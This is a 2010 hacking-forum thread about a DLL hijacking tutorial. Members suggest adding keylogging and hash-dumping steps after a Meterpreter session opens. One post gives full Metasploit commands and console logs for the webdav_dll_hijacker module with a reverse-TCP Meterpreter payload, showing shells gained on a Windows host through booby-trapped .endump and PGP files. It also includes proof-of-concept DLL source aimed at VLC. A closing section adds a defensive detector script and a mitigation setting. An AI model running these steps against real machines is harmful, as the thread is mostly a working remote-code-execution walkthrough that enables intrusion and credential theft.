1337 Posted September 2, 2010

Online version: DLL Hijacking Tutorial
Download: Multiupload.com - upload your files to multiple file hosting sites!

This is an unfinished version; I still have one more method and a few other things to write. If you want, I'll complete all of it. Suggestions are welcome.
qbert Posted September 2, 2010

Finish it, I liked what I read so far.
sado Posted September 2, 2010

http://rstcenter.com/forum/25509-enciclopedie-ca-tot-ati-vrut.rst
You can submit it there.
cla1992 Posted September 2, 2010

Nice. I like the idea. A small suggestion from me: you could also add some interesting options for after a "meterpreter" session has been started. Something like: a keylogger, or simply some hashes, etc. (That would be an extra for those who don't know, since you started explaining from scratch.) Good luck with the tutorial, and we hope it turns out well by the end.
1337 Posted September 2, 2010 (Author)

OK, tomorrow I'll finish it and detail the meterpreter functions and the other method!
qbert Posted September 3, 2010

Ah, and shouldn't it be "set payload windows/meterpreter/reverse_tcp" instead of "payload windows/meterpreter/reverse_tcp"? At 4. Exploitation, point 4.
neox Posted September 8, 2010

I think you mean something like this; look at the video tse.rar, or like this.

Filetype endump

msf exploit(webdav_dll_hijacker) > set EXTENSIONS endump
EXTENSIONS => endump
msf exploit(webdav_dll_hijacker) > show options

Module options:

   Name        Current Setting  Required  Description
   ----        ---------------  --------  -----------
   BASENAME    policy           yes       The base name for the listed files.
   EXTENSIONS  endump           yes       The list of extensions to generate
   SHARENAME   documents        yes       The name of the top-level share.
   SRVHOST     192.168.2.37     yes       The local host to listen on.
   SRVPORT     80               yes       The daemon port to listen on (do not change)
   URIPATH     /                yes       The URI to use (do not change).

Payload options (windows/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  process          yes       Exit technique: seh, thread, process
   LHOST     192.168.2.37     yes       The listen address
   LPORT     4444             yes       The listen port

Exploit target:

   Id  Name
   --  ----
   0   Automatic

msf exploit(webdav_dll_hijacker) > exploit
[*] Exploit running as background job.
[*] Started reverse handler on 192.168.2.37:4444
[*]
[*] Exploit links are now available at \\192.168.2.37\documents\
[*]
[*] Using URL: http://192.168.2.37/
[*] Server started.
msf exploit(webdav_dll_hijacker) >
[*] 192.168.2.45:49310 PROPFIND /documents
[*] 192.168.2.45:49310 PROPFIND => 301 (/documents)
[*] 192.168.2.45:49310 PROPFIND /documents/
[*] 192.168.2.45:49310 PROPFIND => 207 Directory (/documents/)
[*] 192.168.2.45:49310 PROPFIND /documents
[*] 192.168.2.45:49310 PROPFIND => 301 (/documents)
[*] 192.168.2.45:49310 PROPFIND /documents/
[*] 192.168.2.45:49310 PROPFIND => 207 Directory (/documents/)
[*] 192.168.2.45:49310 PROPFIND => 207 Top-Level Directory
[*] 192.168.2.45:49310 PROPFIND /DOCUMENTS
[*] 192.168.2.45:49310 PROPFIND => 301 (/DOCUMENTS)
[*] 192.168.2.45:49310 PROPFIND /DOCUMENTS/
[*] 192.168.2.45:49310 PROPFIND => 207 Directory (/DOCUMENTS/)
[*] 192.168.2.45:49310 PROPFIND => 207 Top-Level Directory
[*] 192.168.2.45:49310 PROPFIND /documents/rsaenh.dll
[*] 192.168.2.45:49310 PROPFIND => 207 File (/documents/rsaenh.dll)
[*] 192.168.2.45:49310 PROPFIND /DOCUMENTS
[*] 192.168.2.45:49310 PROPFIND => 301 (/DOCUMENTS)
[*] 192.168.2.45:49310 PROPFIND /DOCUMENTS/
[*] 192.168.2.45:49310 PROPFIND => 207 Directory (/DOCUMENTS/)
[*] 192.168.2.45:49310 PROPFIND => 207 Top-Level Directory
[*] 192.168.2.45:49310 GET => DLL Payload
[*] 192.168.2.45:49310 PROPFIND /documents/SDDisk.dll
[*] 192.168.2.45:49310 PROPFIND => 207 Directory (/DOCUMENTS/)
[*] 192.168.2.45:49310 PROPFIND => 207 Top-Level Directory
[*] Sending stage (748544 bytes) to 192.168.2.37
[*] Meterpreter session 14 opened (192.168.2.37:4444 -> 192.168.2.45:49315)

msf exploit(webdav_dll_hijacker) > sessions -i 14
[*] Starting interaction with 14...

meterpreter > getuid
Server username: root-Vista\neox

-----------------------------------------------------------------------------------------

PGP - Insecure Library Loading Allows Remote Code Execution (DLL Hijacking)

msf exploit(webdav_dll_hijacker) > set EXTENSIONS pgp
EXTENSIONS => pgp
msf exploit(webdav_dll_hijacker) > show options

Module options:

   Name        Current Setting  Required  Description
   ----        ---------------  --------  -----------
   BASENAME    policy           yes       The base name for the listed files.
   EXTENSIONS  pgp              yes       The list of extensions to generate
   SHARENAME   documents        yes       The name of the top-level share.
   SRVHOST     192.168.2.37     yes       The local host to listen on.
   SRVPORT     80               yes       The daemon port to listen on (do not change)
   URIPATH     /                yes       The URI to use (do not change).

Payload options (windows/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  process          yes       Exit technique: seh, thread, process
   LHOST     192.168.2.37     yes       The listen address
   LPORT     4444             yes       The listen port

Exploit target:

   Id  Name
   --  ----
   0   Automatic

msf exploit(webdav_dll_hijacker) > exploit
[*] Exploit running as background job.
[*] Started reverse handler on 192.168.2.37:4444
[*]
[*] Exploit links are now available at \\192.168.2.37\documents\
[*]
[*] Using URL: http://192.168.2.37/
[*] Server started.
<snip>
[*] 192.168.2.45:49183 PROPFIND /documents/
[*] 192.168.2.45:49183 PROPFIND => 207 Directory (/documents/)
[*] 192.168.2.45:49183 PROPFIND => 207 Top-Level Directory
[*] 192.168.2.45:49183 PROPFIND /documents/policy.pgp
[*] 192.168.2.45:49183 PROPFIND => 207 File (/documents/policy.pgp)
[*] 192.168.2.45:49183 PROPFIND /documents/credssp.dll
[*] 192.168.2.45:49183 PROPFIND => 207 File (/documents/credssp.dll)
[*] 192.168.2.45:49183 PROPFIND /
[*] 192.168.2.45:49183 PROPFIND => 207 Directory (/)
[*] 192.168.2.45:49183 PROPFIND => 207 Top-Level Directory
[*] 192.168.2.45:49183 GET => DLL Payload
[*] 192.168.2.45:49183 PROPFIND /DOCUMENTS
[*] 192.168.2.45:49183 PROPFIND => 301 (/DOCUMENTS)
[*] 192.168.2.45:49183 PROPFIND /DOCUMENTS/
[*] 192.168.2.45:49183 PROPFIND => 207 Directory (/DOCUMENTS/)
[*] 192.168.2.45:49183 PROPFIND => 207 Top-Level Directory
[*] 192.168.2.45:49183 PROPFIND /documents/rundll32.exe
[*] 192.168.2.45:49183 PROPFIND => 404 (/documents/rundll32.exe)
[*] Sending stage (748544 bytes) to 10.8.28.55
[*] Meterpreter session 1 opened (192.168.2.37:4444 -> 192.168.2.45:49189) at Sun Aug 29 20:40:27 +0200 2010

msf exploit(webdav_dll_hijacker) > sessions -i 1
[*] Starting interaction with 1...

meterpreter > getuid
Server username: neox-Vista\neox

And there are two more methods. One is, for example, VLC player, as described on exploit-db, coded in OllyDbg:

Place a .mp3 file and wintab32.dll in the same folder and execute the .mp3 file in VLC player.

Code for wintab32.dll:

/*----------*/
/* wintab32.cpp */
#include "stdafx.h"
#include <windows.h>   /* MessageBox, DllMain types (added so the file builds on its own) */
#include "dragon.h"

/* Proof-of-concept payload: just shows a message box when the DLL is mapped. */
void init() {
    MessageBox(NULL, "Pwned", "Pwned!", 0x00000003);
}

BOOL APIENTRY DllMain(HANDLE hModule, DWORD ul_reason_for_call, LPVOID lpReserved)
{
    switch (ul_reason_for_call) {
    case DLL_PROCESS_ATTACH:
        init();      /* runs as soon as the host process loads the DLL */
        break;
    case DLL_THREAD_ATTACH:
    case DLL_THREAD_DETACH:
    case DLL_PROCESS_DETACH:
        break;
    }
    return TRUE;
}
/*----------*/

I'll make a video of this one when I have time, and I'm currently working on the third method ....
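From the defender's side, the console output above leaves a very recognisable trace on the victim: a DLL with a system-library name (rsaenh.dll, credssp.dll, SDDisk.dll, wintab32.dll) is mapped from a WebDAV/UNC share or from a user-writable folder instead of System32. The following Python check is an added example, not code from the thread or from Metasploit; the records are constructed and modelled on Sysmon Event ID 7 (ImageLoad) fields, and the field names used here are an assumption.

```python
import ntpath
from dataclasses import dataclass
from typing import List, Optional, Tuple

# DLL names from the thread's console output and PoC. Each is one an
# application expects to resolve from a system directory, so a load of
# that name from anywhere else is worth a look.
SYSTEM_DLLS = {"rsaenh.dll", "credssp.dll", "sddisk.dll", "wintab32.dll"}
SYSTEM_DIRS = ("c:\\windows\\system32\\", "c:\\windows\\syswow64\\")


@dataclass
class ImageLoad:
    image: str         # process that performed the load (Sysmon "Image", assumed)
    image_loaded: str  # full path of the mapped DLL (Sysmon "ImageLoaded", assumed)
    signed: bool       # Authenticode status of the DLL


def is_remote_path(path: str) -> bool:
    """UNC path (\\\\host\\share\\...), \\\\?\\UNC\\..., or a WebClient DavWWWRoot path."""
    p = path.lower()
    return p.startswith("\\\\") or "davwwwroot" in p


def classify(ev: ImageLoad) -> Optional[str]:
    """Return a finding label, or None when the load looks normal."""
    name = ntpath.basename(ev.image_loaded).lower()
    directory = ntpath.dirname(ev.image_loaded).lower() + "\\"
    if is_remote_path(ev.image_loaded):
        return "dll-loaded-from-network-share"
    if name in SYSTEM_DLLS and not directory.startswith(SYSTEM_DIRS):
        return "system-dll-name-outside-system32"
    return None


def scan(events: List[ImageLoad]) -> List[Tuple[str, str, str]]:
    """(process, dll, finding) for every event that triggers a rule."""
    findings = []
    for ev in events:
        label = classify(ev)
        if label:
            findings.append((ev.image, ev.image_loaded, label))
    return findings


# Constructed sample records; share and host mirror the thread's \\192.168.2.37\documents.
SAMPLE = [
    ImageLoad(r"C:\Windows\System32\rundll32.exe", r"C:\Windows\System32\kernel32.dll", True),
    ImageLoad(r"C:\Windows\System32\rundll32.exe", r"\\192.168.2.37\documents\rsaenh.dll", False),
    ImageLoad(r"C:\Program Files\PGP\PGPtray.exe", r"\\192.168.2.37\documents\credssp.dll", False),
    ImageLoad(r"C:\Program Files\VideoLAN\VLC\vlc.exe", r"C:\Users\neox\Downloads\wintab32.dll", False),
    ImageLoad(r"C:\Program Files\VideoLAN\VLC\vlc.exe", r"C:\Windows\System32\wintab32.dll", True),
]

if __name__ == "__main__":
    for image, dll, finding in scan(SAMPLE):
        print(f"{finding}: {image} loaded {dll}")
```

On the host side, Microsoft's CWDIllegalInDllSearch setting (KB2264107) can refuse library loads from WebDAV and remote shares outright, so on a fleet with it deployed the first finding type should be rare and any hit is worth triage.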